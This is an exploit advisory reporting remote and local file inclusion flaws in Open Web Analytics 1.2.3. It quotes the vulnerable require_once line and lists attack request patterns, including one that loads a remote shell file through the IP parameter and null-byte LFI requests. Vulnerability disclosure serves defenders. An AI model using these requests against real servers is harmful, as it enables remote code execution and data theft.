Open Web Analytics version 1.2.3 suffers from local and remote file inclusion vulnerabilities.
775a437a1765611d92661c4f7f41697e6982a9be40a452df1d2606795d4f83ff
===========================================================================
( #Topic : Open Web Analytics 1.2.3
( #Bug type : multi file include
( #Download : https://downloads.openwebanalytics.com/owa/owa_1_2_3.tar
( #Advisory :
===========================================================================
( #Author : ItSecTeam
( #Email : Bug@ITSecTeam.com
( #Website: https://www.itsecteam.com
( #Forum : https://forum.ITSecTeam.com
( #Original Advisory: www.ITSecTeam.com/en/vulnerabilities/vulnerability26.htm
( #Special Tnx : ahmadbady , M3hr@n.S And All Team Members!
vuls:===================================================================
path/mw_plugin.php
require_once "$IP/includes/SpecialPage.php";
exploit:===================================================================
rfi : path/mw_plugin.php?IP=shell.txt?
lfi :path/index.php?owa_action=[lfi]%00
lfi :path/index.php?owa_do=[lfi]%00
--------------------------------------